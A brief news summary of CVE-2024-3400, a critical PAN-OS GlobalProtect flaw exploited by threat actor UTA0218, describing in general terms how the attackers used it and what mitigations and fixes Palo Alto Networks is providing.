Priya PatelTLDR:
Pwning Palo Alto Networks! A critical vulnerability in PAN-OS software affects GlobalProtect gateways, allowing attackers to execute remote code with root privileges. Exploited by threat actor UTA0218, the flaw dates back to March 2024. Mitigations and updates are being provided, with a fix expected by April 14.
Palo Alto Networks to Fix Exploited GlobalProtect Zero-Day
Palo Alto Networks has issued a critical alert for a vulnerability in its PAN-OS software used in firewall-VPN products. The flaw, CVE-2024-3400, has a severity score of 10 out of 10 and can be exploited by attackers to take control of affected gateways remotely. The vulnerability affects GlobalProtect gateways on PAN-OS 10.2, 11.0, and 11.1 configurations with device telemetry enabled.
Zero-day exploitation of the vulnerability was detected by cybersecurity firm Volexity, with the threat actor identified as UTA0218. The attacker could create a reverse shell, download tools onto the device, and export configuration data to move laterally within organizations. Initial intrusion methods involved configuring a cron job to retrieve payloads from an attacker-controlled URL and execute commands.
Palo Alto Networks, referring to the exploitation as Operation MidnightEclipse, has provided mitigations and a hotfix for the vulnerability. Customers are urged to implement the mitigations and temporary disable device telemetry until the permanent fix is applied. The company is actively notifying customers and working to address the issue promptly.
Overall, the article highlights the severity of the vulnerability, the exploitation by threat actor UTA0218, the measures Palo Alto Networks is taking to address the issue, and the importance of immediate action by customers to secure their systems.
